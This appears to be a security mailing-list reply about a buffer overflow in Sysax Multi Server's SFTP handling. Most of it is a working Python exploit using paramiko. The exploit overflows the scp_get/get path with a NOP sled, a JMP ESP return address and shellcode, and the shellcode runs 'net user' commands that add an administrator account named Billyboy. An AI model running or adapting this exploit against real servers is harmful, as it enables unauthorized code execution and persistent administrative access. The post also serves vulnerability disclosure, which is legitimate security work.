Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities

[rob () accensussecurity com]

Assuming the server is running as admin the overflow can actually be used to execute arbitrary code.  In our example we 
spawn an instance of cmd.exe and create a new admin, Billyboy, with a password of woot. 

This has been tested with Windows XP SP2.  

+-------- Start Exploit --------+

import paramiko
import sys      

t_ip = "192.168.1.104"                  #target IP
t_port = 4019                                   #target port
password = "asdf"                               #Known user
username = "asdf"                               #password for user

transport = paramiko.Transport((t_ip, t_port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)

sftp.chdir("./")                                #Execute a good command
buff_pen = "\x90" * 389
buff_pen += "\x65\x82\xa5\x7c"  #Point EIP to JMP ESP command in shell32.dll
buff_pen += "\x90" * 3
buff_pen += 
"\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x79\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x64\x6d\x69\x6e\x00"
  #Shellcode to make a new admin, billyboy, with a password of 'woot'
buff_pen += "\x90" * 3
buff_pen += "\xcc" * (800 - len(buff_pen))
sftp.get(buff_pen)

+-------- Stop Exploit --------+